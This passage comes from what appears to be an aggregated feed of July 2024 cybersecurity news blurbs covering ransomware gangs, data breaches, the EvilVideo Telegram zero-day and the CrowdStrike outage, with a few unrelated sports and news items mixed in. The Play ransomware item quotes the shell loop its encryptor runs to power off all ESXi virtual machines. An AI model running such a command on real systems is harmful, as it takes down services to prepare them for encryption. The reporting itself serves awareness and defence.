
          Autosummary: Prompt to launch an external video player (Source: ESET). Next, an additional step is required: the victim must enable the installation of unknown apps from the device settings, allowing the malicious APK file to install on the device. Step requiring the approval of APK installation (Source: ESET). Though the threat actor claims the exploit is "one-click," the fact that it requires multiple clicks, steps, and specific settings for a malicious payload to be executed on a victim's device significantly reduces the risk of a successful attack. "


          Los Angeles Superior Court shuts down after ransomware attack

          exploits ransomware
          2024-07-22 https://www.bleepingcomputer.com/news/security/los-angeles-superior-court-shuts-down-after-ransomware-attack/
          The largest trial court in the United States, the Superior Court of Los Angeles County, closed all 36 courthouse locations on Monday to restore systems affected by a Friday ransomware attack. [...] "

          Autosummary: "The Court experienced an unprecedented cyber-attack on Friday which has resulted in the need to shut down nearly all network systems in order to contain the damage, protect the integrity and confidentiality of information and ensure future network stability and security," Presiding Judge Samantha P. Jessner said. "


          End-user cybersecurity errors that can cost you millions

          ciber
          2024-07-22 https://www.bleepingcomputer.com/news/security/end-user-cybersecurity-errors-that-can-cost-you-millions/
          An innocent mistake can lead to a corporate nightmare. Learn from Specops Software about five of the most frequent cybersecurity blunders that can let attackers breach a network. [...] "

          Autosummary: Cybercriminals could gain access to corporate data, cloud applications, and storage, opening up a Pandora's box of security risks, including data breaches, intellectual property theft, and reputational damage. Reusing passwords: You can have an effective password policy in place, but if your employees are reusing their passwords on less-secure personal devices, websites, and applications, then they’re still leaving the door wide open for cybercriminals. To prevent these mix-ups, consider requiring encryption for sensitive emails, implementing pop-up reminders for double-checking addresses, and deploying data loss prevention solutions that act as a safety net. "


          Heritage Foundation data breach containing personal data is available online

          financial
          2024-07-22 https://www.malwarebytes.com/blog/news/2024/07/heritage-foundation-data-breach-containing-personal-data-is-available-online
          Data from the Heritage Foundation containing at least half a million passwords and usernames are available online "

          Autosummary: The stolen data includes email addresses, usernames, passwords, phone numbers, IP addresses, full names, and may contain other compromised user details. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


          PINEAPPLE and FLUXROOT Hacker Groups Abuse Google Cloud for Credential Phishing

          financial
          2024-07-22 https://thehackernews.com/2024/07/pineapple-and-fluxroot-hacker-groups.html
          A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has been observed leveraging Google Cloud serverless projects to orchestrate credential phishing activity, highlighting the abuse of the cloud computing model for malicious purposes. "Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google "

          Autosummary: "


          MSPs & MSSPs: How to Increase Engagement with Your Cybersecurity Clients Through vCISO Reporting

          ciber
          2024-07-22 https://thehackernews.com/2024/07/msps-mssps-how-to-increase-engagement.html
          As a vCISO, you are responsible for your client's cybersecurity strategy and risk governance. This incorporates multiple disciplines, from research to execution to reporting. Recently, we published a comprehensive playbook for vCISOs, “Your First 100 Days as a vCISO – 5 Steps to Success”, which covers all the phases entailed in launching a successful vCISO engagement, along with recommended "

          Autosummary: vCISO Reporting Benefits: Drilling down into the aforementioned purpose, vCISO reporting provides multiple benefits for both the vCISO and the client. For the vCISO: ensuring the vCISO is aligned with client expectations; ensuring the client understands their security and compliance posture; creating a shared vision between the vCISO and the client; building consensus on an improvement path (rather than solely pushing recommendations one-sidedly); anchoring initiatives into business outcomes; and driving retention and sales. For the client: controlling their security destiny; designing their security journey based on business outcomes and allowing them to own the risk associated with their decisions and actions; simplified decision-making; noise reduction; bandwidth and scale; getting easy buttons and resources for tactical execution; and ensuring they perceive the high ROI being provided for their vCISO investment. 4 Essential Sections of a vCISO Report: To uncover all the benefits listed above, it is recommended to create a report that covers four sections. Section 1: General Recap - the summary, top-level metrics and any "hot stove" items. Recently, we published a comprehensive playbook for vCISOs, "Your First 100 Days as a vCISO – 5 Steps to Success", which covers all the phases entailed in launching a successful vCISO engagement, along with recommended actions to take, and step-by-step examples. Section 3: Strategic Review - a roadmap review, holding a business-led discussion, recommendations and mapping the RCT (Resource, Commitment, Time) for the next steps. "


          SocGholish malware used to spread AsyncRAT malware

          exploits
          2024-07-22 https://securityaffairs.com/166030/malware/socgholish-used-deliver-asyncrat.html
          The JavaScript downloader SocGholish (aka FakeUpdates) is being used to deliver AsyncRAT and the legitimate open-source project BOINC. Huntress researchers observed the JavaScript downloader malware SocGholish (aka FakeUpdates) being used to deliver the remote access trojan AsyncRAT and the legitimate open-source project BOINC (Berkeley Open Infrastructure Network Computing Client). The BOINC project is […] "

          Autosummary: By Pierluigi Paganini, July 22, 2024. The JavaScript downloader SocGholish (aka FakeUpdates) is being used to deliver AsyncRAT and the legitimate open-source project BOINC. "


          US sanctions Russian hacktivists who breached water facilities

          rusia-ucrania
          2024-07-22 https://www.bleepingcomputer.com/news/security/us-sanctions-russian-hacktivists-who-breached-water-facilities/
          The US government has imposed sanctions on two Russian cybercriminals for cyberattacks targeting critical infrastructure. [...] "

          Autosummary: The US Treasury mentions the example of Dmitry Khoroshev, the leader of the LockBit ransomware operation, sanctioned in May 2024, as well as Aleksandr Gennadievich Ermakov, a Russian national and a member of the REvil ransomware group, sanctioned in January 2024. "


          New Play ransomware Linux version targets VMware ESXi VMs

          exploits ransomware Linux
          2024-07-22 https://www.bleepingcomputer.com/news/security/new-play-ransomware-linux-version-targets-vmware-esxi-vms/
          Play ransomware is the latest ransomware gang to start deploying a dedicated Linux locker for encrypting VMware ESXi virtual machines. [...] "

          Autosummary: To power off all running VMware ESXi virtual machines so that they can be encrypted, Trend Micro says the encryptor will execute the following code: /bin/sh -c "for vmid in $(vim-cmd vmsvc/getallvms | grep -v Vmid | awk '{print $1}'); do vim-cmd vmsvc/power.off $vmid; done". As BleepingComputer found while analyzing it, this variant is designed to specifically target VMFS (Virtual Machine File System), which is used by VMware's vSphere server virtualization suite. "


          CrowdStrike shares hit again as IT disruption continues

          ransomware
          2024-07-22 https://www.bbc.com/news/articles/c725knvnk5zo
          Shares in the cybersecurity firm drop a further 13% after last week's global IT outage. "

          Autosummary: Delta Airlines, one of the most affected firms, had cancelled more than 4,000 flights since Friday, including more than 700 on Monday, according to outside tracking firm, Flight Aware. "


          Greece’s Land Registry agency breached in wave of 400 cyberattacks

          ciber
          2024-07-22 https://www.bleepingcomputer.com/news/security/greeces-land-registry-agency-breached-in-wave-of-400-cyberattacks/
          The Land Registry agency in Greece has announced that it suffered a limited-scope data breach following a wave of 400 cyberattacks targeting its IT infrastructure over the last week. [...] "

          Autosummary: "


          EvilVideo, a Telegram Android zero-day allowed sending malicious APKs disguised as videos

          exploits
          2024-07-22 https://securityaffairs.com/166042/hacking/evilvideo-telegram-android-zero-day.html
          EvilVideo is a zero-day in the Telegram App for Android that allowed attackers to send malicious APK payloads disguised as videos. ESET researchers discovered a zero-day exploit named EvilVideo that targets the Telegram app for Android. The exploit was for sale on an underground forum from June 6, 2024; it allows attackers to share malicious […] "

          Autosummary: ESET identified the Telegram channel, and obtained it. "Exploiting the #EvilVideo vulnerability on Telegram: We discovered a 0-day Telegram for Android exploit that allows sending malicious apps disguised as videos" https://t.co/fb9FmhFJWV @ESETresearch @ESET pic.twitter.com/cLxUxnAaTB — Lukas Stefanko (@LukasStefanko), July 22, 2024. The exploit likely uses the Telegram API to upload specially crafted multimedia files, making the payload appear as a 30-second video rather than a binary attachment. "


          Ten footballers to watch out for at Paris Olympics

          industry
          2024-07-22 https://www.bbc.com/sport/football/articles/cek91m98g48o
          From Manchester City's Julian Alvarez to Brazil icon Marta, BBC Sport picks out 10 footballers to watch at the Olympics. "

          Autosummary: "


          Cursed tapes: Exploiting the EvilVideo vulnerability on Telegram for Android

          exploits
          2024-07-22 https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/
          ESET researchers discovered a zero-day Telegram for Android exploit that allows sending malicious files disguised as videos "

          Autosummary: Underground forum post advertising an Android cryptor-as-a-service. Vulnerability report: After discovering the EvilVideo vulnerability on June 26th, 2024, we followed our coordinated disclosure policy and reported it to Telegram, but received no response at the time. Using the exploit to abuse a vulnerability that we named EvilVideo, attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files. We were able to locate an example of the exploit, allowing us to analyze it further, and report it to Telegram on June 26th, 2024. Explanation of the EvilVideo vulnerability. Key points of the blogpost: On June 26th, 2024, in an underground forum, we found an advertisement for a zero-day exploit that targets Telegram for Android. "


          U.S. CISA adds Adobe Commerce and Magento, SolarWinds Serv-U, and VMware vCenter Server bugs to its Known Exploited Vulnerabilities catalog

          exploits
          2024-07-21 https://securityaffairs.com/165981/hacking/u-s-cisa-adds-adobe-commerce-and-magento-solarwinds-serv-u-and-vmware-vcenter-server-bugs-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe Commerce and Magento, SolarWinds Serv-U, and VMware vCenter Server bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-34102, Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability; CVE-2024-28995, SolarWinds Serv-U Path Traversal Vulnerability; CVE-2022-22948, VMware vCenter Server Incorrect Default File Permissions Vulnerability. Below are the descriptions of the flaws added to the KEV catalog: CVE-2024-34102 (CVSS score of 9.8) – the flaw is an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary code execution. "


          Security Affairs Malware Newsletter – Round 3

          exploits
          2024-07-21 https://securityaffairs.com/166014/malware/security-affairs-malware-newsletter-round-3.html
          Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Hardening of HardBit; 10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit; This Meeting Should Have Been an Email; Ransomware Detection Model Based on Adaptive Graph Neural Network Learning; SEXi ransomware rebrands to APT INC, continues […]



          Fake CrowdStrike updates target companies with malware, data wipers

          exploits
          2024-07-21 https://www.bleepingcomputer.com/news/security/fake-crowdstrike-updates-target-companies-with-malware-data-wipers/
          Threat actors are exploiting the massive business disruption from CrowdStrike's glitchy update on Friday to target companies with data wipers and remote access tools. [...]

          Autosummary: Computer crashes led to thousands of flights being canceled, disrupted activity at financial companies, brought down hospitals, media organizations, railways, and even impacted emergency services.


          Fake CrowdStrike fixes target companies with malware, data wipers

          exploits
          2024-07-21 https://www.bleepingcomputer.com/news/security/fake-crowdstrike-fixes-target-companies-with-malware-data-wipers/
          Threat actors are exploiting the massive business disruption from CrowdStrike's glitchy update on Friday to target companies with data wipers and remote access tools. [...]

          Autosummary: Computer crashes led to thousands of flights being canceled, disrupted activity at financial companies, brought down hospitals, media organizations, railways, and even impacted emergency services.


          How adware exposed victims to kernel-level threats – Week in Security with Tony Anscombe

          Linux
          2024-07-21 https://www.welivesecurity.com/en/videos/adware-kernel-level-threats-week-security-tony-anscombe/
          A purported ad blocker marketed as a security solution hides kernel-level malware that inadvertently exposes victims to even more dangerous threats.



          Russian nationals plead guilty to participating in the LockBit ransomware group

          exploits ransomware rusia-ucrania
          2024-07-20 https://securityaffairs.com/165941/cyber-crime/lockbit-ransomware-group-members-plead-guilty.html
          Two Russian nationals pleaded guilty to participating in the LockBit ransomware group and carrying out attacks against victims worldwide. Two foreign nationals, Ruslan Magomedovich Astamirov and Mikhail Vasiliev, pleaded guilty in Newark federal court for their roles in the LockBit ransomware operation. The LockBit ransomware operation has been active since January 2020, the group hit […]

          Autosummary: In May 2023, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks. On April 26, 2021, Matveev and his Babuk coconspirators hit the Metropolitan Police Department in Washington, D.C. The Russian citizen was charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers.


          Scam warning as fake emails and websites target users after outage

          financial
          2024-07-20 https://www.bbc.com/news/articles/cq5xy12pynyo
          Agencies in the UK and Australia are warning people to be vigilant about fake emails, calls and websites.

          Autosummary: By Joe Tidy, Cyber correspondent, BBC World Service. Cyber-security experts and agencies around the world are warning people about a wave of opportunistic hacking attempts linked to the IT outage.


          Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware

          exploits ciber
          2024-07-20 https://thehackernews.com/2024/07/cybercriminals-exploit-crowdstrike.html
          Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide IT disruptions by pushing out a flawed update to Windows devices, is now warning that threat actors are exploiting the situation to distribute Remcos RAT to its customers in Latin America under the guise of providing a hotfix. The attack chains involve distributing a ZIP archive file named "crowdstrike-hotfix.zip,"



          Mass IT outage affects airlines, media and banks

          financial
          2024-07-19 https://www.bbc.com/news/articles/cv2g5lvwkl2o
          Major banks, media outlets, telecom providers and an airline are among those reporting to be affected.



          Russians plead guilty to involvement in LockBit ransomware attacks

          exploits ransomware rusia-ucrania
          2024-07-19 https://www.bleepingcomputer.com/news/security/russians-plead-guilty-to-involvement-in-lockbit-ransomware-attacks/
          Two Russian individuals admitted to participating in many LockBit ransomware attacks, which targeted victims worldwide and across the United States. [...]

          Autosummary: Between 2021 and 2023, Vasiliev (aka Ghostrider, Free, Digitalocean90, Digitalocean99, Digitalwaters99, and Newwave110) also used LockBit ransomware in at least 12 attacks against victims worldwide, including businesses in New Jersey, Michigan, the United Kingdom, and Switzerland, causing at least $500,000 in damage and losses, according to the guilty plea.


          Two Russian Nationals Plead Guilty in LockBit Ransomware Attacks

          exploits ransomware rusia-ucrania
          2024-07-19 https://thehackernews.com/2024/07/two-russian-nationals-plead-guilty-in.html
          Two Russian nationals have pleaded guilty in a U.S. court for their participation as affiliates in the LockBit ransomware scheme and helping facilitate ransomware attacks across the world. The defendants include Ruslan Magomedovich Astamirov, 21, of Chechen Republic, and Mikhail Vasiliev, 34, a dual Canadian and Russian national of Bradford, Ontario. Astamirov was arrested in Arizona by U.S. law

          Autosummary: Astamirov (aka BETTERPAY, offtitan, and Eastfarmer) is said to have deployed LockBit against at least 12 victims between 2020 and 2023, receiving $1.9 million in ransom payments from victims located in the U.S. state of Virginia, Japan, France, Scotland, and Kenya.


          MediSecure: Ransomware gang stole data of 12.9 million people

          exploits ransomware
          2024-07-19 https://www.bleepingcomputer.com/news/security/medisecure-ransomware-gang-stole-data-of-129-million-people/
          MediSecure, an Australian prescription delivery service provider, revealed that roughly 12.9 million people had their personal and health information stolen in an April ransomware attack. [...]



          Number of data breach victims goes up 1,000%

          financial
          2024-07-19 https://www.malwarebytes.com/blog/news/2024/07/number-of-data-breach-victims-goes-up-1000
          The Identity Theft Resource Center has published a report showing a 1,170% increase in compromised data victims compared to the same quarter last year.

          Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. The number of data breaches where driver’s license data was stolen totaled 198 instances in pre-pandemic, full-year 2019 compared to 636 in full-year 2023 and 308 through June 30, 2024. Protecting yourself after a data breach: There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.


          Update: Worldwide IT outage due to buggy Crowdstrike update

          exploits
          2024-07-19 https://www.helpnetsecurity.com/2024/07/19/crowdstrike-it-outage-update/

          The world is 16+ hours into what looks like the biggest IT outage in history, triggered by a defective update for Crowdstrike endpoint security software for Windows machines. The price of both Crowdstrike’s and Microsoft’s shares has tumbled down as a result, and the companies are offering (and updating) advice on how organizations can recover affected workstations and endpoints. The restoration might not be that much of a problem for organizations in the IT sector … More

          The post Update: Worldwide IT outage due to buggy Crowdstrike update appeared first on Help Net Security.


          Autosummary: The restoration might not be that much of a problem for organizations in the IT sector and with a healthy number of IT staff, but will likely be a long process for companies that have outsourced their IT department or have a huge number of affected Windows-based systems that are scattered and cannot be quickly serviced en masse (e.g., information kiosks, display systems, PoS systems, etc.).


          MediSecure data breach impacted 12.9 million individuals

          financial
          2024-07-19 https://securityaffairs.com/165932/security/medisecure-databreach-12-9m-individuals.html
          Personal and health information of 12.9 million individuals was exposed in a ransomware attack on Australian digital prescription services provider MediSecure. MediSecure is a company that provides digital health solutions, particularly focusing on secure electronic prescription delivery services in Australia. In May, the company was forced to shut down its website and phone lines following […]

          Autosummary: The stolen data includes the reason for the prescription and instructions, full name, title, date of birth, gender, email address, address, phone number, individual healthcare identifier (IHI), Medicare card number, including individual identifier, and expiry, Pensioner Concession card number and expiry, Commonwealth Seniors card number and expiry, Healthcare Concession card number and expiry, Department of Veterans’ Affairs (DVA) (Gold, White, Orange) card number and expiry, prescription medication, including name of drug, strength, quantity and repeats; and reason for prescription and instructions.


          Global services slowly recovering after bug causes IT chaos

          exploits
          2024-07-19 https://www.bbc.com/news/articles/cg3m4jgdprxo
          The incident has sparked concern over the vulnerability of the world's interconnected technologies.

          Autosummary: "We're deeply sorry for the impact that we've caused to customers, to travellers, to anyone affected by this, including our company," he told the NBC network.


          The complexities of cybersecurity update processes

          ciber
          2024-07-19 https://www.welivesecurity.com/en/cybersecurity/complexities-cybersecurity-update-processes/
          If a software update process fails, it can lead to catastrophic consequences, as seen today with widespread blue screens of death blamed on a bad update by CrowdStrike.

          Autosummary: Cybersecurity is often about speed; a threat actor creates a malicious attack technique or code, cybersecurity companies react to the new threat and, if necessary, adjust and adopt methods to detect the threat.


          Microsoft fixes bug blocking Windows 11 Photos from starting

          exploits
          2024-07-18 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-blocking-windows-11-photos-from-starting/
          Microsoft has fixed a known issue preventing the Microsoft Photos app from starting on some Windows 11 22H2 and 23H2 systems. [...]



          Critical Cisco bug lets hackers add root users on SEG devices

          exploits
          2024-07-18 https://www.bleepingcomputer.com/news/security/critical-cisco-bug-lets-hackers-add-root-users-on-seg-devices/
          Cisco has fixed a critical severity vulnerability that lets attackers add new users with root privileges and permanently crash Security Email Gateway (SEG) appliances using emails with malicious attachments. [...]



          Critical Splunk flaw can be exploited to grab passwords (CVE-2024-36991)

          exploits
          2024-07-18 https://www.helpnetsecurity.com/2024/07/18/cve-2024-36991-poc/

          A recently fixed vulnerability (CVE-2024-36991) affecting Splunk Enterprise on Windows “is more severe than it initially appeared,” according to SonicWall’s threat researchers. Several PoC exploits have been published, including one by IT consultant Mohamed Nabil Ali that performs bulk scanning for vulnerable internet-facing endpoints and attempts to read the /etc/passwd file. About CVE-2024-36991 Splunk Enterprise is a data analytics and monitoring platform that allows organizations to collect and analyze machine-generated data from a variety of … More

          The post Critical Splunk flaw can be exploited to grab passwords (CVE-2024-36991) appeared first on Help Net Security.




          Alert: HotPage Adware Disguised as Ad Blocker Installs Malicious Kernel Driver

          Linux
          2024-07-18 https://thehackernews.com/2024/07/alert-hotpage-adware-disguised-as-ad.html
          Cybersecurity researchers have shed light on an adware module that purports to block ads and malicious websites, while stealthily offloading a kernel driver component that grants attackers the ability to run arbitrary code with elevated permissions on Windows hosts. The malware, dubbed HotPage, gets its name from the eponymous installer ("HotPage.exe"), according to new findings from ESET. The

          Autosummary: "Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component."


          Automated Threats Pose Increasing Risk to the Travel Industry

          industry
          2024-07-18 https://thehackernews.com/2024/07/automated-threats-pose-increasing-risk.html
          As the travel industry rebounds post-pandemic, it is increasingly targeted by automated threats, with the sector experiencing nearly 21% of all bot attack requests last year. That’s according to research from Imperva, a Thales company. In their 2024 Bad Bot Report, Imperva finds that bad bots accounted for 44.5% of the industry’s web traffic in 2023—a significant jump from 37.4% in 2022.

          Autosummary: Time-sensitive, high-value travel transactions enable quick monetization, often before fraud is detected, resulting in financial losses, damaged customer trust, and harm to the company's reputation. Therefore, Imperva advocates for layered defenses, including user behavior analysis, profiling, and fingerprinting, as essential measures for the travel industry. Imperva suggests several quick wins, such as blocking outdated browser versions, restricting access from bulk IP data centers, and implementing detection strategies for signs of automation, like unusually fast interactions. These are some of the most common ways travel-related applications are targeted daily: Fare Scraping: The use of bots to aggregate pricing information, inventories, discounted fares, and more.


          Meta Halts AI Use in Brazil Following Data Protection Authority's Ban

          latam
          2024-07-18 https://thehackernews.com/2024/07/meta-halts-ai-use-in-brazil-following.html
          Meta has suspended the use of generative artificial intelligence (GenAI) in Brazil after the country's data protection authority issued a preliminary ban objecting to its new privacy policy. The development was first reported by news agency Reuters. The company said it has decided to suspend the tools while it is in talks with Brazil's National Data Protection Authority (ANPD) to address the



          "Argentina song stained glory of Copa victory"

          latam
          2024-07-18 https://www.bbc.com/sport/football/articles/cpe39n00ng2o
          South American football writer Tim Vickery assesses the fallout - and origins - of the alleged racist chant that has led to Enzo Fernandez facing disciplinary action.

          Autosummary: Fifa is also investigating the video, in which several members of the Argentina squad - celebrating their 1-0 win over Colombia in the final - take part in a song originally sung by Argentina fans questioning the heritage of France's black and mixed-race players.


          SolarWinds fixes 8 critical bugs in access rights audit software

          exploits
          2024-07-18 https://www.bleepingcomputer.com/news/security/solarwinds-fixes-8-critical-bugs-in-access-rights-audit-software/
          SolarWinds has fixed eight critical vulnerabilities in its Access Rights Manager (ARM) software, six of which allowed attackers to gain remote code execution (RCE) on vulnerable devices. [...]

          Autosummary: With over 300,000 customers worldwide at the time, SolarWinds serviced 96% of Fortune 500 companies, including high-profile tech companies like Apple, Google, and Amazon, and government organizations like the U.S. Military, Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.


          Revolver Rabbit gang registers 500,000 domains for malware campaigns

          exploits
          2024-07-18 https://www.bleepingcomputer.com/news/security/revolver-rabbit-gang-registers-500-000-domains-for-malware-campaigns/
          A cybercriminal gang that researchers track as Revolver Rabbit has registered more than 500,000 domain names for infostealer campaigns that target Windows and macOS systems. [...]

          Autosummary: The researchers say that “connecting the Revolver Rabbit RDGA to an established malware after months of tracking highlights the importance of understanding RDGAs as a technique within the threat actor’s toolbox.”


          Yacht giant MarineMax data breach impacts over 123,000 people

          financial
          2024-07-17 https://www.bleepingcomputer.com/news/security/yacht-giant-marinemax-data-breach-impacts-over-123-000-people/
          MarineMax, self-described as the world's largest recreational boat and yacht retailer, is notifying over 123,000 customers whose personal information was stolen in a March security breach claimed by the Rhysida ransomware gang. [...]

          Autosummary: "Based on our investigation of the incident, we determined that an unauthorized third party obtained access to our environment from March 1, 2024 to March 10, 2024," MarineMax said.


          Rite Aid says 2.2 million people affected in data breach

          financial
          2024-07-17 https://www.malwarebytes.com/blog/news/2024/07/rite-aid-says-2-2-million-people-affected-in-data-breach
          Rite Aid has started notifying 2.2 million people that were affected by a data breach that was part of a June ransomware attack.

          Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Reportedly, the stolen data appears to be limited to purchases made between June 6, 2017, and July 30, 2018.


          Cisco SSM On-Prem bug lets hackers change any user's password

          exploits
          2024-07-17 https://www.bleepingcomputer.com/news/security/cisco-ssm-on-prem-bug-lets-hackers-change-any-users-password/
          Cisco has fixed a maximum severity vulnerability that allows attackers to change any user's password on vulnerable Cisco Smart Software Manager On-Prem (Cisco SSM On-Prem) license servers, including administrators. [...]



          HardBit ransomware – what you need to know

          exploits ransomware
          2024-07-17 https://www.tripwire.com/state-of-security/hardbit-ransomware-what-you-need-know
          A new strain of the HardBit ransomware has emerged in the wild, which contains a protection mechanism in an attempt to prevent analysis from security researchers. Read more in my article on the Tripwire State of Security blog.

          Autosummary: The ransom note left behind by HardBit asks victims to make contact via TOX, an open-source peer-to-peer secure messaging platform. So, if they don't appear to have a leak site on the dark web, how are you supposed to negotiate the ransom payment?


          North Korean Hackers Update BeaverTail Malware to Target MacOS Users

          exploits
          2024-07-17 https://thehackernews.com/2024/07/north-korean-hackers-update-beavertail.html
          Cybersecurity researchers have discovered an updated variant of a known stealer malware that attackers affiliated with the Democratic People's Republic of Korea (DPRK) have delivered as part of prior cyber espionage campaigns targeting job seekers. The artifact in question is an Apple macOS disk image (DMG) file named "MiroTalk.dmg" that mimics the legitimate video call service of the same name,

          Autosummary: The infection process starts with phishing messages that impersonate security and diplomatic organizations and contain a malicious executable that, upon opening, leads to the download of a Visual Basic Script (VBS), which, in turn, retrieves a PowerShell script to harvest user account, system and network information as well as enumerate files and processes.


          China-linked APT17 Targets Italian Companies with 9002 RAT Malware

          exploits
          2024-07-17 https://thehackernews.com/2024/07/china-linked-apt17-targets-italian.html
          A China-linked threat actor called APT17 has been observed targeting Italian companies and government entities using a variant of a known malware referred to as 9002 RAT. The two targeted attacks took place on June 24 and July 2, 2024, Italian cybersecurity company TG Soft said in an analysis published last week. "The first campaign on June 24, 2024 used an Office document, while the second



          Scattered Spider Adopts RansomHub and Qilin Ransomware for Cyber Attacks

          exploits ransomware
          2024-07-17 https://thehackernews.com/2024/07/scattered-spider-adopts-ransomhub-and.html
          The infamous cybercrime group known as Scattered Spider has incorporated ransomware strains such as RansomHub and Qilin into its arsenal, Microsoft has revealed. Scattered Spider is the designation given to a threat actor that's known for its sophisticated social engineering schemes to breach targets and establish persistence for follow-on exploitation and data theft. It also has a history of



          Critical Apache HugeGraph Vulnerability Under Attack - Patch ASAP

          exploits
          2024-07-17 https://thehackernews.com/2024/07/critical-apache-hugegraph-vulnerability.html
          Threat actors are actively exploiting a recently disclosed critical security flaw impacting Apache HugeGraph-Server that could lead to remote code execution attacks. Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API. "Users are



          MarineMax data breach impacted over 123,000 individuals

          financial
          2024-07-17 https://securityaffairs.com/165843/data-breach/marinemax-data-breach.html
          The world’s largest recreational boat and yacht retailer MarineMax disclosed a data breach following a cyber attack. The world’s largest recreational boat and yacht retailer MarineMax disclosed a data breach that impacted over 123,000 individuals. In March, the company suffered a cyber attack, and the Rhysida ransomware gang claimed to have stolen sensitive company data. […]

          Autosummary: “As disclosed in the Original Report, on March 10, 2024, we determined that the Company experienced a “cybersecurity incident,” as defined in applicable SEC rules, whereby a third party gained unauthorized access to portions of our information environment (the “Incident”).


          Void Banshee exploits CVE-2024-38112 zero-day to spread malware

          exploits
          2024-07-17 https://securityaffairs.com/165832/apt/void-banshee-cve-2024-38112-zero-day-attacks.html
          Void Banshee APT group exploited the Windows zero-day CVE-2024-38112 to execute code via the disabled Internet Explorer. An APT group tracked as Void Banshee was spotted exploiting the Windows zero-day CVE-2024-38112 (CVSS score of 7.5) to execute code through the disabled Internet Explorer. The vulnerability is a Windows MSHTML Platform Spoofing Vulnerability. Successful exploitation of […]

          Autosummary: By Pierluigi Paganini, July 17, 2024.


          The Octo Tempest group adds RansomHub and Qilin ransomware to its arsenal

          exploits ransomware
          2024-07-17 https://securityaffairs.com/165811/cyber-crime/octo-tempest-ransomhub-qilin-ransomware.html
          Microsoft said that in Q2 2024, the Octo Tempest cybercrime gang added RansomHub and Qilin ransomware to its arsenal. In the second quarter of 2024, financially motivated threat actor Octo Tempest (aka Scattered Spider, UNC3944, and 0ktapus), added RansomHub and Qilin ransomware to its arsenal and used them in its campaigns. Octo Tempest has been active […]



          Uncontacted indigenous people sighted in Peru

          latam
          2024-07-17 https://www.bbc.com/news/videos/czrj0neyk4ko
          An uncontacted indigenous people in Peru has been spotted close to where logging companies have concessions.



          Rite Aid says June data breach impacts 2.2 million people

          financial
          2024-07-16 https://www.bleepingcomputer.com/news/security/rite-aid-says-june-data-breach-impacts-22-million-people/
          Rite Aid, the third-largest drugstore chain in the United States, says that 2.2 million customers' personal information was stolen last month in what it described as a "data security incident." [...]

          Autosummary: "This data included purchaser name, address, date of birth and driver’s license number or other form of government-issued ID presented at the time of a purchase between June 6, 2017, and July 30, 2018."


          Microsoft links Scattered Spider hackers to Qilin ransomware attacks

          exploits ransomware
          2024-07-16 https://www.bleepingcomputer.com/news/security/microsoft-links-scattered-spider-hackers-to-qilin-ransomware-attacks/
          Microsoft says the Scattered Spider cybercrime gang has added Qilin ransomware to its arsenal and is now using it in attacks. [...]



          Microsoft finally fixes Outlook alerts bug caused by December updates

          exploits
          2024-07-16 https://www.bleepingcomputer.com/news/microsoft/microsoft-finally-fixes-outlook-alerts-bug-caused-by-december-updates/
          Microsoft has finally fixed a known Outlook issue, confirmed in February, which was triggering incorrect security alerts after installing the December security updates for Outlook Desktop. [...]



          CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks

          exploits
          2024-07-16 https://www.bleepingcomputer.com/news/security/cisa-warns-critical-geoserver-geotools-rce-flaw-is-exploited-in-attacks/
          CISA is warning that a critical GeoServer GeoTools remote code execution flaw tracked as CVE-2024-36401 is being actively exploited in attacks. [...]



          Iranian Hackers Deploy New BugSleep Backdoor in Middle East Cyber Attacks

          exploits
          2024-07-16 https://thehackernews.com/2024/07/iranian-hackers-deploy-new-bugsleep.html
          The Iranian nation-state actor known as MuddyWater has been observed using a never-before-seen backdoor as part of a recent attack campaign, shifting away from its well-known tactic of deploying legitimate remote monitoring and management (RMM) software for maintaining persistent access. That's according to independent findings from cybersecurity firms Check Point and Sekoia, which have

          Autosummary: The sectors targeted include airlines, IT companies, telecoms, pharma, automotive manufacturing, logistics, travel, and tourism.


          Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

          exploits
          2024-07-16 https://thehackernews.com/2024/07/void-banshee-apt-exploits-microsoft.html
          An advanced persistent threat (APT) group called Void Banshee has been observed exploiting a recently disclosed security flaw in the Microsoft MHTML browser engine as a zero-day to deliver an information stealer called Atlantida. Cybersecurity firm Trend Micro, which observed the activity in mid-May 2024, said the vulnerability – tracked as CVE-2024-38112 – was used as part of a multi-stage attack

